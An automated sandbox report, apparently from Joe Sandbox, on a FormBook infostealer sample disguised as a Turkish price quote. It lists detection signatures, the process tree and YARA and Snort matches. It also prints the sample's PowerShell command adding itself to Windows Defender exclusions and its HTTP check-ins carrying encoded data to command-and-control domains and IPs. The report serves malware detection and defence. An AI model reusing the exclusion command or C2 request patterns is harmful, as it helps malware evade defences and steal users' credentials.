Windows Analysis Report
Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe

Overview

General Information

Sample name:Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Analysis ID:1466660
MD5:7c9c6894ac6c53f5066c4e42a0e2121f
SHA1:8f6ed8a129c9968be749912335313e0886eb93e8
SHA256:a8528698af2f0256467229c6e265bad403c57d941040cfd94678516769587394
Tags:exegeoTUR
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe (PID: 6604 cmdline: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" MD5: 7C9C6894AC6C53F5066C4E42A0E2121F)
    • powershell.exe (PID: 7180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" MD5: 7C9C6894AC6C53F5066C4E42A0E2121F)
      • owYCvHvzfwuh.exe (PID: 3868 cmdline: "C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • unregmp2.exe (PID: 7508 cmdline: "C:\Windows\SysWOW64\unregmp2.exe" MD5: 51629AAAF753C6411D0B7D37620B7A83)
          • owYCvHvzfwuh.exe (PID: 1356 cmdline: "C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x49742:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x32cf1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ab40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dfc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17572:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ParentImage: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ParentProcessId: 6604, ParentProcessName: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ProcessId: 7180, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ParentImage: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ParentProcessId: 6604, ParentProcessName: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe", ProcessId: 7180, ProcessName: powershell.exe

            AV Detection

            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeReversingLabs: Detection: 60%
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeVirustotal: Detection: 60%
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeJoe Sandbox ML: detected
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: unregmp2.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: owYCvHvzfwuh.exe, 00000008.00000002.3778328626.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3778593047.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: unregmp2.pdbGCTL source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDBE00 FindFirstFileW,FindNextFileW,FindClose,9_2_00BDBE00
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then xor eax, eax9_2_00BC97B0
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then pop edi9_2_00BCE09E
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then mov ebx, 00000004h9_2_0502053E

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49713 -> 23.111.180.146:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49714 -> 103.197.25.241:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49715 -> 103.197.25.241:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 103.197.25.241:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 212.227.172.254:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 212.227.172.254:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 212.227.172.254:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 109.95.158.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 109.95.158.122:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 109.95.158.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 35.227.248.111:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 35.227.248.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 35.227.248.111:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49743 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49746 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49747 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49750 -> 47.239.13.172:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49751 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49752 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49754 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49755 -> 66.235.200.146:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49756 -> 66.235.200.146:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49758 -> 66.235.200.146:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49759 -> 23.111.180.146:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49760 -> 103.197.25.241:80
            Source: DNS query: www.evertudy.xyz
            Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
            Source: Joe Sandbox ViewIP Address: 23.111.180.146 23.111.180.146
            Source: Joe Sandbox ViewIP Address: 103.197.25.241 103.197.25.241
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
            Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: DHOSTING-ASWarsawPolandPL DHOSTING-ASWarsawPolandPL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g== HTTP/1.1Host: www.dennisrosenberg.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.ennerdaledevcons.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /9285/?hH=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuUoJvGkxfj7PnqEMVCvhqUXK8NAJvVg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.artemhypnotherapy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.mocar.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.evertudy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.luo918.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.fungusbus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.qe1jqiste.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.thesprinklesontop.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.stefanogaus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: unknownHTTP traffic detected: POST /vfca/ HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: max-age=0Content-Length: 191Content-Type: application/x-www-form-urlencodedOrigin: http://www.dxgsf.shopReferer: http://www.dxgsf.shop/vfca/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:53:25 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
